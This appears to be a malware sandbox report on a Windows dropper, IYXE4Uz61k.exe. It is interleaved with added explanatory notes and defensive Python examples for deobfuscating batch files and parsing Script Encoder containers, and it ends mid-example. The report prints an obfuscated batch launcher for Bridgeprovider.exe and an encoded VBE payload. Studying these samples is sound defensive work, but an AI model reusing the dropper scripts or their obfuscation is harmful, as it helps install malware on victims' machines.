                                                                                                                                                                                                  Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1532
                                                                                                                                                                                                  Entropy (8bit):5.058591167088024
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                  MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                  SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                  SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                  SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5292
                                                                                                                                                                                                  Entropy (8bit):5.115440205505611
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:DxapqZink/QIHQIyzQIZQILuQIR8vtklGovxNx6sWwCvCCcTKvIrrg9BMM6VwDjz:sJnkoBs/sqLz8cTKvIrrUiM6VwDjyeWs
                                                                                                                                                                                                  MD5:137D13F917D94C83137A0FA5AE12B467
                                                                                                                                                                                                  SHA1:01E93402C225BF2A4EE59F9A06F8062CB5E4801E
                                                                                                                                                                                                  SHA-256:36738E6971D2F20DB78433185A0EF7912A48544AA6FF7006505A7DC785158859
                                                                                                                                                                                                  SHA-512:1B22CBC6E22FA5E2BD5CC4A370443A342D00E7DD53330A4000E9A680DE80262BCA7188764E3568944D01025188291602AC8C53C971630984FBD9FA7D75AAB124
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:Metadata-Version: 2.1..Name: cryptography..Version: 41.0.7..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
File Type:CSV text
Category:dropped
Size (bytes):15168
Entropy (8bit):5.546877465471185
Encrypted:false
SSDEEP:384:3XpaU/ZfaigianJN5/6T2UbycOx6uvnbLEG:3MUxfzhctJEG
MD5:5E9FE04D9B7C72A0CEAB82279DC041A7
SHA1:55BD916F8AA7A96C4749F573224AEDEF19D19AD4
SHA-256:9C715FEEF321EE70D54257485FAE3461B5A848032B1A13CDE408B68633DC2811
SHA-512:69B51C02C51D0881CBD8BF8A1D08F902EE4ED21CF26055EA09A9AC98BE26AA1F80A90D3D6DCA6090AE248C7D41FAA0BF47F794BBFB2A65A36811B2840948F710
Malicious:false
Preview:cryptography-41.0.7.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-41.0.7.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-41.0.7.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-41.0.7.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-41.0.7.dist-info/METADATA,sha256=NnOOaXHS8g23hDMYWg73kSpIVEqm_3AGUFp9x4UViFk,5292..cryptography-41.0.7.dist-info/RECORD,,..cryptography-41.0.7.dist-info/WHEEL,sha256=-EX5DQzNGQEoyL99Q-0P0-D-CXbfqafenaAeiSQ_Ufk,100..cryptography-41.0.7.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=uPXMbbcptt7EzZ_jllGRx0pVdMn-NBsAM4L74hOv-b0,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/__about__.cpython-38.pyc,,..cryptography/__pycache__/__init__.cpython-38.pyc,,..cryptography/__
Process:C:\Windows\Tasks\MSTask.exe
File Type:ASCII text
Category:dropped
Size (bytes):100
Entropy (8bit):5.0203365408149025
Encrypted:false
SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKc/SKQLn:RtBMwlVCxWKxDQLn
MD5:4B432A99682DE414B29A683A3546B69F
SHA1:F59C5016889EE5E9F62D09B22AEFBC2211A56C93
SHA-256:F845F90D0CCD190128C8BF7D43ED0FD3E0FE0976DFA9A7DE9DA01E89243F51F9
SHA-512:CBBF10E19B6F4072C416EA95D7AE259B9C5A1B89068B7B6660B7C637D6F2437AEA8D8202A2E26A0BEC36DAECD8BBB6B59016FC2DDEB13C545F0868B3E15479CA
Malicious:false
Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp37-abi3-win_amd64..
Process:C:\Windows\Tasks\MSTask.exe
File Type:ASCII text
Category:dropped
Size (bytes):13
Entropy (8bit):3.2389012566026314
Encrypted:false
SSDEEP:3:cOv:Nv
MD5:E7274BD06FF93210298E7117D11EA631
SHA1:7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
SHA-256:28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
SHA-512:AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
Malicious:false
Preview:cryptography.
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):6673920
Entropy (8bit):6.582002531606852
Encrypted:false
SSDEEP:98304:EzN+T+xtLlk0PPMAiGoTzeDy3x8lGBlWi9Nk:E5Y6Jk0PPMtfTzp3x8c
MD5:486085AAC7BB246A173CEEA0879230AF
SHA1:EF1095843B2A9C6D8285C7D9E8E334A9CE812FAE
SHA-256:C3964FC08E4CA8BC193F131DEF6CC4B4724B18073AA0E12FED8B87C2E627DC83
SHA-512:8A56774A08DA0AB9DD561D21FEBEEBC23A5DEA6F63D5638EA1B608CD923B857DF1F096262865E6EBD56B13EFD3BBA8D714FFDCE8316293229974532C49136460
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3381792
Entropy (8bit):6.094908167946797
Encrypted:false
SSDEEP:49152:Y4TKuk29SIU6i5fOjPWl+0rOh5PKToEGG9I+q4dNQbZQm9aGupuu9LoeiyPaRb84:YiV+CGQ4dtBMeiJRb8+1CPwDv3uFZjN
MD5:BF83F8AD60CB9DB462CE62C73208A30D
SHA1:F1BC7DBC1E5B00426A51878719196D78981674C4
SHA-256:012866B68F458EC204B9BCE067AF8F4A488860774E7E17973C49E583B52B828D
SHA-512:AE1BDDA1C174DDF4205AB19A25737FE523DCA6A9A339030CD8A95674C243D0011121067C007BE56DEF4EAEFFC40CBDADFDCBD1E61DF3404D6A3921D196DCD81E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):32792
Entropy (8bit):6.372276555451265
Encrypted:false
SSDEEP:384:JYnlpDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYPoBhT/A4:JYe0Vn5Q28J8qsqMttktuTSTWDG4yhRe
MD5:4424BAF6ED5340DF85482FA82B857B03
SHA1:181B641BF21C810A486F855864CD4B8967C24C44
SHA-256:8C1F7F64579D01FEDFDE07E0906B1F8E607C34D5E6424C87ABE431A2322EBA79
SHA-512:8ADB94893ADA555DE2E82F006AB4D571FAD8A1B16AC19CA4D2EFC1065677F25D2DE5C981473FABD0398F6328C1BE1EBD4D36668EA67F8A5D25060F1980EE7E33
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):686112
Entropy (8bit):5.528877787845415
Encrypted:false
SSDEEP:12288:3L6MSpHovlo4qL7a3ZV9CblMOoAXToRtrBZf3Fb85BO9K9pB3TLPDdOU2lvz8:wIAL7a3heSFZf2Pq63HJOU2lvz
MD5:FE1F3632AF98E7B7A2799E3973BA03CF
SHA1:353C7382E2DE3CCDD2A4911E9E158E7C78648496
SHA-256:1CE7BA99E817C1C2D71BC88A1BDD6FCAD82AA5C3E519B91EBD56C96F22E3543B
SHA-512:A0123DFE324D3EBF68A44AFAFCA7C6F33D918716F29B063C72C4A8BD2006B81FAEA6848F4F2423778D57296D7BF4F99A3638FC87B37520F0DCBEEFA3A2343DE0
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):67072
Entropy (8bit):5.90551713971002
Encrypted:false
SSDEEP:1536:ZhseNxkc7Xva0Y420G1UD+dS4gBeLmRy:Z1kcbi0Y42bUD+dS4oeiRy
MD5:01F9D30DD889A3519E3CA93FE6EFEE70
SHA1:EBF55ADBD8CD938C4C11D076203A3E54D995AEFF
SHA-256:A66444A08A8B9CEAFA05DAEFEB32AA1E65C8009A3C480599F648FA52A20AFB7D
SHA-512:76FED302D62BB38A39E0BF6C9038730E83B6AFFFA2F36E7A62B85770D4847EA6C688098061945509A1FDB799FB7F5C88699F94E7DA1934F88A9C3B6A433EE9EF
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):58952
Entropy (8bit):5.849953914987793
Encrypted:false
SSDEEP:768:oS99q+0o22ByfbEap+VCBQ53gUiT5pLFdBk4/yFi1nuVwWBjChtFyrUdmd9RSxDD:79xiEAnUvdK1IGV0QyrI
MD5:7ACEC875D5672E7AA148B8C40DF9AA49
SHA1:96B8CFABE0CFA3DF32995919AC77CFDEEC26F1F2
SHA-256:D96858E433F45917499DBF5E052E56F079FF9AE259FD3CAA025C3B1DAF852891
SHA-512:1208DA62FE82B779EC822AD702F9CA4321B34EE590C28E10EFE9A2DB6D582BFDCAE01AB2431C1A98714EF0C60434D64C58F3DB31BF5886EFBB943ADC70D6E975
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............d..d..d.N.l..d.N.d..d.N..d.N.f..d.Rich.d.........PE..d.....].........." .....................................................................`.........................................` ..@...............................H............ ..T............................................................................text............................... ..`.rdata..d.... ......................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4183112
                                                                                                                                                                                                  Entropy (8bit):6.420172758698049
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:wV6CJES/Za2BaobNruDPYRQYK8JCNNtkAz+/Q46VqNo9NYxwCFIInKHJCMjntPNj:MxB/aDUQNtufeNFIKHoMjzkDU
                                                                                                                                                                                                  MD5:D2A8A5E7380D5F4716016777818A32C5
                                                                                                                                                                                                  SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                                                                                                                                  SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                                                                                                                                  SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26696
                                                                                                                                                                                                  Entropy (8bit):6.101296746249305
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                                                  MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                                                  SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                                                  SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                                                                                                                                  SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1096264
                                                                                                                                                                                                  Entropy (8bit):5.343512979675051
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                                                  MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                                                  SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                                                  SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                                                  SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Tasks\1.exe
File Type:ASCII text, with CRLF line terminators (a two-line batch script; the %name% tokens around the Bridgeprovider.exe path reference variables that are never defined, which cmd.exe expands to nothing)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):96
                                                                                                                                                                                                  Entropy (8bit):4.958784022195587
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:WOS3mMuq7lArYAsQHT9Xz4ZCLMExn:7sIYAsST28LB
                                                                                                                                                                                                  MD5:5A4D5C42A21C0F7F61E44CC10B160A75
                                                                                                                                                                                                  SHA1:3924118492974AAA21D048FFB78E7EFBFC3F448D
                                                                                                                                                                                                  SHA-256:7D327844199CB637CA5B55C6818F8D1C9E259969DC0764CD5AD43D4FFEE2F97C
                                                                                                                                                                                                  SHA-512:DE82248B68361A7C0CC1F9A8B842905C6DD4D02429D7F387FD7032C874DE5B6760DE25C2919DBA14BEB4EBDF0D6D0C8A0B14882EA6006B776F0093DCB1DC4455
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:%IqxkBwRWQCiL%%jjSqKeRxrrEx%..%elHmjYD%"%SystemDrive%\Windows/Bridgeprovider.exe"%itjtkgnjQHSFE%
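The batch file above is a common dropper trick: the only real content is the quoted path to Bridgeprovider.exe, and every other %name% token refers to an environment variable that does not exist, so cmd.exe silently expands it to an empty string and the launcher line survives intact. The following is an added example, not part of the Joe Sandbox report: a small deobfuscator that replays that expansion rule in Python over the 96-byte file reconstructed from the preview (the ".." in the preview is taken to be the CRLF that the file type and size imply). It approximates batch-file %VAR% handling only (no %~1 argument modifiers, no delayed expansion), which is all this sample uses.

```python
import re
from typing import Dict, List

# Constructed sample: the 96-byte batch file dropped by C:\Windows\Tasks\1.exe,
# copied from the report preview with the ".." rendered as the CRLF it represents.
DROPPED_BAT = (
    "%IqxkBwRWQCiL%%jjSqKeRxrrEx%\r\n"
    "%elHmjYD%\"%SystemDrive%\\Windows/Bridgeprovider.exe\"%itjtkgnjQHSFE%"
)


def expand_batch_line(line: str, env: Dict[str, str]) -> str:
    """Approximate cmd.exe %VAR% expansion as it happens inside a batch file:
    '%%' becomes a literal '%', a defined variable (case-insensitive) is
    replaced by its value, an undefined variable becomes an empty string, and
    a lone '%' with no closing '%' is dropped."""
    lowered = {k.lower(): v for k, v in env.items()}
    out: List[str] = []
    i = 0
    while i < len(line):
        ch = line[i]
        if ch != "%":
            out.append(ch)
            i += 1
            continue
        if i + 1 < len(line) and line[i + 1] == "%":
            out.append("%")
            i += 2
            continue
        end = line.find("%", i + 1)
        if end == -1:
            i += 1
            continue
        name = line[i + 1:end]
        out.append(lowered.get(name.lower(), ""))
        i = end + 1
    return "".join(out)


def deobfuscate_batch(text: str, env: Dict[str, str]) -> List[str]:
    """Return the non-empty effective command lines after expansion."""
    lines = [expand_batch_line(line, env) for line in text.split("\r\n")]
    return [line.strip() for line in lines if line.strip()]


def junk_variable_names(text: str, env: Dict[str, str]) -> List[str]:
    """Referenced variable names that are defined nowhere; a list of random
    looking names like this is the fingerprint of the obfuscation."""
    defined = {k.lower() for k in env}
    names = re.findall(r"%([A-Za-z0-9_]+)%", text)
    return sorted({n for n in names if n.lower() not in defined})


if __name__ == "__main__":
    # Only SystemDrive is assumed to be defined on the victim, as it is on any Windows host.
    env = {"SystemDrive": "C:"}
    for cmd in deobfuscate_batch(DROPPED_BAT, env):
        print(cmd)
    print("undefined tokens:", junk_variable_names(DROPPED_BAT, env))
```

The expanded result is a single command, the quoted path to Bridgeprovider.exe under the system drive (the mixed backslash and forward slash in the path is accepted by Windows as written). Running the same expansion over other droppers of this family gives the launched path without executing anything.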
                                                                                                                                                                                                  Process:C:\Windows\Tasks\1.exe
File Type:data (the #@~^ header and ==^#~@ trailer visible in the preview are the Microsoft Script Encoder container used for .vbe/.jse files, so the generic "data" verdict understates what this is)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):207
                                                                                                                                                                                                  Entropy (8bit):5.752747180497372
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:GLwqK+NkLzWbHa/818nZNDd3RL1wQJR6CdkVOq7YOs:GiMCzWLaG4d3XBJbKVOj
                                                                                                                                                                                                  MD5:44D478A2A134EFF221F8607007B0BE7A
                                                                                                                                                                                                  SHA1:76A2838354EF1CA830DBF8EA4CDE03F27D0115DE
                                                                                                                                                                                                  SHA-256:E99A4322B12DA688C7130FB4F621E6AED22A0F9F62F2D01041F5796BF5D83B27
                                                                                                                                                                                                  SHA-512:6D738A4EF7F38A2A7969C26405E7BD0B6AE443AA8FC04E8A3ECC9C650E812097CFB888246E6E99FF464AD2E8C213A7A5873D6E7E9F6C37CB88B8E633F3B4C472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#@~^tgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JujH/O.:GDk7+u&.bx[WS/&&6h9dG.wMtae 4mYr~~!S~6ls/.9TkAAA==^#~@.
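The 207-byte file above is an encoded script in the Microsoft Script Encoder format: a #@~^ marker, an 8-character field giving the encoded body length (base64 of a little-endian 32-bit integer), the encoded body, an 8-character checksum field in the same encoding, and a ^#~@ trailer. Line breaks are not encoded but stored as the escape @#@& (CR LF), so the number of script lines is visible without decoding. The following is an added example, not part of the Joe Sandbox report: a parser that validates this framing over the preview bytes and reports what can be read from the container alone. It deliberately does not decode the script text, which requires the encoder's substitution tables; the point is to confirm the file type and structure that the "data" verdict misses. The final byte of the file is shown as "." in the preview and is assumed here to be a newline.

```python
import base64
import struct
from typing import Dict

MAGIC_START = "#@~^"
MAGIC_END = "^#~@"
LINE_BREAK_ESCAPE = "@#@&"   # CR LF as stored by the Script Encoder

# Constructed sample: the 207-byte file dropped by C:\Windows\Tasks\1.exe, copied
# from the report preview. The trailing "\n" stands in for the last byte, which
# the preview renders as "." (assumption).
DROPPED_VBE = (
    "#@~^tgAAAA=="
    "j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&"
    "j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JujH/O.:GDk7+u&.bx[WS/&&6h9dG.wMtae 4mYr~~!S~6ls/."
    "9TkAAA==^#~@\n"
)


def _decode_u32_field(field: str) -> int:
    """The length and checksum fields are 8 base64 characters (6 data characters
    plus '==') encoding a little-endian 32-bit integer."""
    raw = base64.b64decode(field)
    if len(raw) != 4:
        raise ValueError("malformed 32-bit field")
    return struct.unpack("<I", raw)[0]


def parse_vbe_container(data: str) -> Dict[str, object]:
    """Validate the Script Encoder framing and return what the container reveals
    without decoding the script text."""
    if not data.startswith(MAGIC_START):
        raise ValueError("not a Script Encoder container")
    declared_len = _decode_u32_field(data[4:12])
    body = data[12:12 + declared_len]
    tail = data[12 + declared_len:].rstrip("\r\n")
    if len(tail) != 12 or not tail.endswith("==" + MAGIC_END):
        raise ValueError("trailer does not line up with the declared body length")
    checksum = _decode_u32_field(tail[:8])     # encoder checksum field, not verified here
    return {
        "declared_len": declared_len,
        "body_len": len(body),
        "checksum": checksum,
        "source_lines": body.count(LINE_BREAK_ESCAPE) + 1,
    }


if __name__ == "__main__":
    print(parse_vbe_container(DROPPED_VBE))
```

For this sample the declared length (182) matches the body exactly and three @#@& escapes split it into four lines of script, which is consistent with a short launcher. A length field that disagrees with the body, or a missing trailer, is a sign the file was truncated or hand-edited.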
                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.999810867604253 (practically the 8.0 maximum: nearly all of the 50 MB image is compressed or encrypted payload rather than code)
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                  File name:IYXE4Uz61k.exe
                                                                                                                                                                                                  File size:50'529'184 bytes
                                                                                                                                                                                                  MD5:0c1cb4cc583aabc07f0482f7e0767ecf
                                                                                                                                                                                                  SHA1:2b1cc7fdfd2ec5668df1e1f0ff15153f70523e71
                                                                                                                                                                                                  SHA256:8ee6e8e2e26826c0d702f32e5cab8a3a551c6b92481b76d1b16b9e7fb3f62607
                                                                                                                                                                                                  SHA512:15ae49dedaa74c4a38cd597b7244214f59f7e09862ca1f7ed072fbe8c5a97cd4332c8e448b026e26c2dfdbd7b24d9be38d601a8c63c96046107a1262ee2249d2
                                                                                                                                                                                                  SSDEEP:1572864:s4oYmMGYcQP9UK7E3/rjmDHVZIU7oWJ5v:sRac6z70/H+XJ7ow
                                                                                                                                                                                                  TLSH:9FB73351DEDD7939C4262CBF1B423948C87CE46A2EACC81F77EE125097A1AD17F062E1
                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                                                                                                                                  Icon Hash:1515d4d4442f2d2d
                                                                                                                                                                                                  Entrypoint:0x41f530
                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
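The static fields above come straight out of the PE headers: the timestamp and Characteristics from the COFF file header, and the entry point, image base, version numbers, subsystem and DLL characteristics from the PE32 optional header, with "Digitally signed" answered by whether the Certificate Table data directory is empty. The following is an added example, not part of the Joe Sandbox report: a struct-based reader for exactly those fields, run over header bytes constructed to carry the values listed above (the sample's own bytes are not reproduced, and no sections follow the headers). It handles PE32 only, since this sample is 32-bit; the "File Version" label is assumed to be the report's name for MajorImageVersion/MinorImageVersion. Keep in mind that the compile timestamp is written by the linker and is attacker-controlled, so a 2022 stamp on a sample submitted much later is a hint, not evidence.

```python
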